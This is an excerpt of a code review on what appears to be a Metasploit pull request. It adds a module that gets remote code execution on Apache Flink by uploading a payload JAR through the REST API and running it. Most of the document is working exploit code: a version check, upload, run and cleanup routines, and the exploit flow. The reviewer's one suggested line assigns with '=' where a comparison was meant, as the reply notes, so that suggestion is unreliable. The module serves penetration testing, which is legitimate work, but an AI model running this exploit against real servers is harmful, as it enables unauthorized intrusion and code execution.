modules/exploits/multi/http/apache_flink_jar_upload_exec.rb

```diff
@@ -0,0 +1,203 @@
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+            'Stability' => [ CRASH_SAFE ],
+            'Reliability' => [ REPEATABLE_SESSION]
+          }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8081)
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'config')
+    })
+
+    unless res
+      return CheckCode::Safe('No reply.')
+    end
+
+    unless res.body.include?('flink')
+      return CheckCode::Safe('Target is not Apache Flink.')
+    end
+
+    version = res.body.scan(/"flink-version":"(.+?)"/).flatten.first
+    if version
+      return CheckCode::Appears("Apache Flink version #{version}.")
+    end
+
+    CheckCode::Appears
+  end
+
+  def delete_jar(filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'jars', filename),
+      'method' => 'DELETE',
+      'ctype' => 'application/json;charset=UTF-8'
+    )
+  end
+
+  def list_jars
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'jars'),
+      'method' => 'GET'
+    )
+  end
+
+  def upload_jar(filename, data)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(data, 'application/x-java-archive', 'binary', "form-data; name=\"jarfile\"; filename=\"#{filename}\"")
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'jars', 'upload'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    )
+  end
+
+  def run_jar(filename, entry_class)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'jars', filename, 'run'),
+      'method' => 'POST',
+      'ctype' => 'application/json;charset=UTF-8',
+      'vars_get' => {
+        'entry-class' => entry_class
+      },
+      'data' => {
+        entryClass: entry_class,
+        parallelism: nil,
+        programArgs: nil,
+        savepointPath: nil,
+        allowNonRestoredState: nil
+      }.to_json
+    )
+  end
+
+  def cleanup
+    return unless @jar
+
+    print_status("Removing JAR file '#{@jar}' ...")
+
+    res = delete_jar(@jar)
+
+    unless res && res.code == 200
+      print_warning("Cleanup failed. Could not remove JAR file '#{@jar}'")
+    end
+  end
+
+  def exploit
+    data = generate_payload.encoded_jar.pack
+    fail_with(Failure::Unknown, 'Failed to generate the JAR payload.') unless data
+
+    filename = "#{rand_text_alpha(8..12)}.jar"
+
+    print_status("Uploading JAR payload '#{filename}' (#{data.length} bytes) ...")
+
+    res = upload_jar(filename, data)
+
+    unless res
+      fail_with(Failure::Unreachable, 'JAR upload failed. No reply.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "JAR upload failed. Unexpected reply (HTTP #{res.code}).")
+    end
+
+    unless res.body.include?('"status":"success"')
```

Comment:
Similar comment here regarding use of `#get_json_document`:

```suggestion
    unless res.get_json_document['status'] = 'success'
```

Reply:
> 
> 
> Similar comment here regarding use of `#get_json_document`:

`=` != `==` :P